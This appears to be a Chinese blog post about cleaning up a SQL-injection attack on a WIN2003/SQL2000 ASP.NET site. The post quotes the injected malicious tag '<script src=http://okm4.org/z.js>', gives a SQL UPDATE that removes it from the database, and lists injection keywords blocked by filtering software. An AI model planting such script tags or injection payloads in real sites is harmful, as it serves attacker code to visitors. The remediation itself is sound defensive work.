最近很多网站都被挂<script src=http://okm4.org/z.js></script>这个JS,这个是SQL注入引起的!
下面我介绍下WIN2003+SQL2000的解决办法,我服务器里就一个asp.net的站点被注入,网站是直接大不开,因为关键词字段被注入了,肯定网站程序出错,对每个数据表进行检查对注入的字段进行替换修复,代码如下:
update aspnet_Membership set Email=replace(Email,'<script src=http://okm4.org/z.js></script>','') where Email like '%<script src=http://okm4.org/z.js></script>%'
其他数据库可以参考我的这种解决办法!
OK,数据库修复网站正常打开,那接下来怎么办?网站程序有注入漏洞,对网站程序进行加固,我用的是专业的防注入软件启用Cookie拦截及SQL拦截。对cast@declare@0x4400@exec@varchar@ 进行了过滤!
一般网站出现问题3种情况:
1、服务器本身不安全;
2、数据库没配置好;
3、网站程序有漏洞;
一个个排查并进行解决,肯定会保证服务器没问题啦!
okm4.org/z.js的解决办法,其实就是被挂马的解决办法,都是被注入!
领会电子商务的精髓才能真正赚钱,SEO不过是电子商务环节里的一个小部分而已!欢迎大家拍砖交流!QQ:15635131